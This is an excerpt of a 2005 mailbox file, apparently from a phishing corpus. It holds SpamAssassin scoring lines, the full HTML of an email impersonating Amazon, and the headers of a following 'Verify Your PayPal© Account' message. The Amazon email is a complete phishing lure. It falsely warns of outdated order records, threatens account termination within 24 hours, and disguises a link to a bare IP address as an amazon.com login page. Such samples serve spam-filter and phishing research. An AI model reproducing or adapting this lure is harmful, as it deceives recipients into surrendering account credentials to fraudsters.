	*  0.0 NO_REAL_NAME From: does not include a real name
	*  0.0 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 HTML_TAG_EXIST_TBODY BODY: HTML has "tbody" tag
	*  0.1 RAZOR2_CF_RANGE_51_100 BODY: Razor2 gives confidence level above 50%
	*      [cf: 100]
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  1.5 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
	*  0.1 MIME_HEADER_CTYPE_ONLY 'Content-Type' found without required MIME headers
Content-Length: 3791
Lines: 54
Status: O
X-Status: 
X-Keywords:                  
X-UID: 445


<HTML>
<meta name="generator" content="Namo WebEditor v5.0(Trial)">
&nbsp;  <IMG height=30 
src="http://g-images.amazon.com/images/G/04/icons/amazon-logo.gif" width=140> <TABLE cellSpacing=0 cellPadding=0 width=600
align=center border=0> <TBODY> <TR> <TD><IMG height=2
src="pp.files/pixel.gif"  width=2></TD></TR></TBODY></TABLE> <P><FONT
size=2><FONT face=Verdana>Dear&nbsp;<STRONG><STRONG><SPAN
style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: 
Verdana">Amazon<SUP>® &nbsp;</SUP></SPAN></STRONG>&nbsp;</STRONG>member</FONT>,&nbsp;<BR></font><BR></P>
<P><FONT face=Verdana size=2>It has come to our attention that
your&nbsp;<SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY:
Verdana"><STRONG>Amazon</STRONG></SPAN> order Information 
records are &nbsp;<BR>out of date.That requires you to update
the order Information If you could&nbsp;<BR>please take
5-10 minutes out of your online&nbsp;<FONT face=Verdana size=2>
experience and update&nbsp;<BR>your order records,  you will not run 
into any future problems with Amazon&nbsp;<BR>online service.

&nbsp;<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</FONT></FONT></P>
<P><FONT face=Verdana 
size=2><FONT face=Verdana size=2>However, failure to update your records will
result in account termination.&nbsp;<BR>Please update your records in 
maximum 24 hours.&nbsp;</FONT>&nbsp;<BR><BR>Once you have updated
records, your&nbsp;<SPAN style="FONT-SIZE: 10pt; COLOR: black; 
FONT-FAMILY: Verdana"><STRONG>Amazon</STRONG></SPAN> session
will not be&nbsp;<BR>interrupted and will continue as normal. </FONT></P>
<P><FONT face=Verdana size=2>To update your <SPAN style="FONT-SIZE: 10pt;
COLOR: black; FONT-FAMILY:
Verdana"><STRONG>Amazon</STRONG></SPAN> order Information 
click on the
following link:&nbsp;<BR></FONT></P>
<p><FONT face=Verdana size=2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</FONT><SPAN class=treb><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: Verdana"><A 
onclick="return ShowLinkWarning()" 
href="http://212.44.154.205/icons/exec/register/login/index.html" 
target=_blank>http://www.amazon.com/exec/obidos/account-access-login/ref=/index</A></SPAN></SPAN></p>
<P>&nbsp;<FONT face=Verdana size=2>Best Regards , <BR><SPAN style="FONT-SIZE:  10pt; 
COLOR: black; 
FONT-FAMILY: Verdana"><STRONG>Amazon<SUP> </SUP><SPAN style="FONT-SIZE: 
10pt; COLOR: black; FONT-FAMILY: Verdana">Security </SPAN></STRONG><SPAN
style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY:
Verdana"><STRONG>Departament</STRONG></SPAN></SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

</FONT></P> <P><FONT face=Verdana size=2>&nbsp;</font>
<p><FONT face=Verdana size=2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  <SPAN class="tiny"><A 
href="http://www.amazon.com/exec/obidos/tg/browse/-/508088/103-3650287-7644618"><font color="#006699" size="2">Conditions 
of Use</font></A><font color="#006699" size="2"> | </font><A 
href="http://www.amazon.com/exec/obidos/tg/browse/-/468496/103-3650287-7644618"><font color="#006699" size="2">Privacy 
Notice</font></A><font color="#006699" size="2"> </font><font size="2">© 1995-2005, Amazon.com, Inc. or its affiliates. </font></SPAN></p>
<TABLE cellSpacing=0 cellPadding=0 
width=600
align=center border=0> <TBODY> <TR> <TD><IMG height=2
src="pp.files/pixel.gif"  width=2></TD></TR></TBODY></TABLE> <P>
</HTML>

From root@mail1.islc.net  Sat Nov 12 14:37:15 2005
Return-Path: <root@mail1.islc.net>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 83A34536E1F
	for <jose@login.monkey.org>; Sat, 12 Nov 2005 14:37:15 -0500 (EST)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id E3CE86FA348
	for <jose@monkey.org>; Sat, 12 Nov 2005 14:37:11 -0500 (EST)
Received: from mail1.islc.net (mail3.islc.net [216.49.160.65])
	by mail2.monkey.org (Postfix) with SMTP
	for <jose@monkey.org>; Sat, 12 Nov 2005 14:37:11 -0500 (EST)
Received: (qmail 2033 invoked by uid 60001); 12 Nov 2005 19:23:54 -0000
Date: 12 Nov 2005 19:23:54 -0000
Message-ID: <20051112192354.2032.qmail@mail1.islc.net>
To: jose@monkey.org
Subject: Verify Your PayPal© Account
